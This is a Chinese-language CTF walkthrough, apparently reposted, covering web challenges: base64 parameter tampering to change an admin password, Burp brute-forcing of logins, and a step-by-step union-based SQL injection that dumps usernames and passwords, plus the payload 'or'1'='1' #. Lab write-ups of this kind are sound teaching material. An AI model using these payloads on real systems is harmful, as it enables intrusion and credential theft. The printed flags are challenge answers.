• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

CTF例题合集1

武飞扬头像
Simon_Smith
帮助1

例题1(修改账号提交): nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNIcg==

  1.  
    这是一个修改密码的题目。在前端属性中,把账号那个输入框的readonly属性删除掉。此时账号就可以修改了
  2.  
     
  3.  
    然后burp抓包,送到repeat中。包中post头里有user1=XXX 这个部分是明显的base64加密。解密后发现这是ctfusHr,也就是用户名的二次校验
  4.  
     
  5.  
    所以解密后,构造admin再编码,把编码送回去,账号也同样改成想修改的admin。这样也就成功修改账号了!
  6.  
     
  7.  
    切记 账号和新密码都修改成admin 密码正常写即可。账号可以抓包破除限制,也可以前端删除限制。但是要破除二次校验,都改成admin才可以成功
  8.  
     
  9.  
     
  10.  
     
  11.  
    PS:referer头的base64并不需要修改,服务端并不会去校验

学新通

例题2:

例题来源buuctf

学新通

启动靶机即可

1.用burp抓包登录进入,任意输入账号(除了admin)和密码即可,注意网页对admin账户最开始做了限制,所以admin是没办法登录进去的

2.从注释中得知了进入的位置

学新通

3.访问相应的L0g1n.php

学新通

学新通

学新通

学新通

学新通

学新通

学新通

学新通

学新通

学新通

暴力破解漏洞

1.时间的身份证那题

学新通学新通

学新通

第一次抓包获取的包不是我们要的,可以把包放掉即可获得真实的包:

学新通

学新通

学新通

学新通

调整一下线程 避免出现503

学新通

进行中发现已经有成功的结果了:

学新通

学新通

此时回显是:

\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a02015237 \u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801

进行Unicode解码:

学新通

此时学号是

02015237

身份证号码 也就是初始密码是:

621022199002015237

学新通

ctfshow

ctfshow{662fb316-f2f0-4f58-929d-f7b3d63992ae}

成功过关!

2.401爆破   测试使用 假设知道账号为 admin  密码为shark63

学新通

学新通

学新通

学新通

学新通

学新通

学新通

学新通

切记如果状态码是503则要把线程调小 否则服务器会崩溃

学新通

学新通

状态码200表示请求成功  状态码401表示未授权访问 也就是登录失败

做出相应的解码即可获得密码

学新通学新通

SQL注入漏洞

学新通

1.正常查询说明存在账户admin 回显正常

学新通学新通

2.用用户名作为注入点进行测试

admin'

学新通

判断出来闭合是单引号 接下来构造完整的闭合语句 发现回显正常 说明闭合差不多成功!可以使用and 1=1 和and 1=2进行控制性测试 这里不演示

admin' #

学新通

构造判断语句

  1.  
    admin' order by 3#   //回显正常
  2.  
    admin' order by 4#   //Unknown column '4' in 'order clause'

说明有3列在这个数据库中 接下来可以开始进行数据库的注入操作

-admin' union select 1,2,3 #  //测试回显位置

学新通

-admin' union select 1,database(),3 #

学新通

-admin' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="geek" #

学新通

1.先尝试注入第一个表

-admin' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="geek" and table_name="geekuser" #

学新通

-admin' union select 1,group_concat(username),group_concat(password) from geekuser #

学新通

2.尝试注入第二个表

-admin' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="geek" and table_name="l0ve1ysq1" #

学新通

-admin' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1 #

学新通

这里可以通过burp抓包查看相应的数据:

学新通

学新通

Your password is 'wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{3c955b2a-e5c5-4d2a-886b-3901532211d5}'

payload

flag{3c955b2a-e5c5-4d2a-886b-3901532211d5}

学新通

  1. (方法1)

学新通学新通

学新通

  1.  
    admin' order by 3#    
  2.  
    admin' order by 4//不存在
-admin' union select 1,2,3 #

学新通

flag{c553a8dc-4e7a-4483-a1e8-08419e02035c}

方法2:万能密码

'or'1'='1' #

学新通学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgabijf
系列文章
更多 icon
同类精品
更多 icon
继续加载